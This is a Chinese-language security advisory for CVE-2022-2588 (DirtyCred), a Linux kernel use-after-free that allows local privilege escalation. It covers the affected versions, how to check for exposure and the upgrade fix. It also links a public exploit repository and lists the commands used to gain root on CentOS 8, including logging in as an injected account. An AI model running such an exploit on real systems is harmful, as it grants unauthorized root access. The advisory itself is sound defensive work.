【漏洞预警】CVE-2022-2588:Linux Kernel 权限提升漏洞(Dirtycred)
漏洞说明:
Linux kernel是开源操作系统Linux所使用的内核。在Linux 内核的 net/sched/cls_route.c 实现的 route4_change 中发现了一个存在 use-after-free 缺陷漏洞,该漏洞源于释放后重用,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。
- 公开时间:2022/09/22
- CVE编号:CVE-2022-2588
- 漏洞类型:UAF
- 漏洞等级:高
- 利用可能性:高
- 攻击向量:-
- 攻击成本:中
- 影响范围:一般
- 有无PoC/EXP:有
影响组件:
Linux_Kernel@[2.6.12-rc2, 5.19)
(图片点击放大查看)
排查方式:
获取 Linux_Kernel 版本,判断其版本在[2.6.12-rc2, 5.19)范围内
修复方案:
升级Linux_Kernel到 5.19 或更高版本
参考链接:
代码语言:javascript复制https://www.oscs1024.com/hd/MPS-2022-52796
https://seclists.org/oss-sec/2022/q3/132
https://access.redhat.com/security/cve/cve-2022-2588
https://ubuntu.com/security/CVE-2022-2588
https://security-tracker.debian.org/tracker/CVE-2022-2588
https://sensorstechforum.com/cve-2022-2588-linux-kernel/
https://thehackernews.com/2022/08/as-nasty-as-dirty-pipe-8-year-old-linux.html
(图片点击放大查看)
POC验证
下面为在CentOS8下和Ubuntu 22.04 LTS下使用漏洞PoC工具进行普通用户提权到root的过程
(图片点击放大查看)
代码语言:javascript复制工具来源地址https://github.com/Markakd/CVE-2022-2588
CentOS8下POC验证测试
代码语言:javascript复制su - yuanfan
chmod 755 exp_file_credential
./exp_file_credential
head -n5 /etc/passwd
su user
密码也为user
id
(图片点击放大查看)
Ubuntu22.04下POC验证测试
(图片点击放大查看)
(图片点击放大查看)
免责声明:
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。请遵守网络安全法。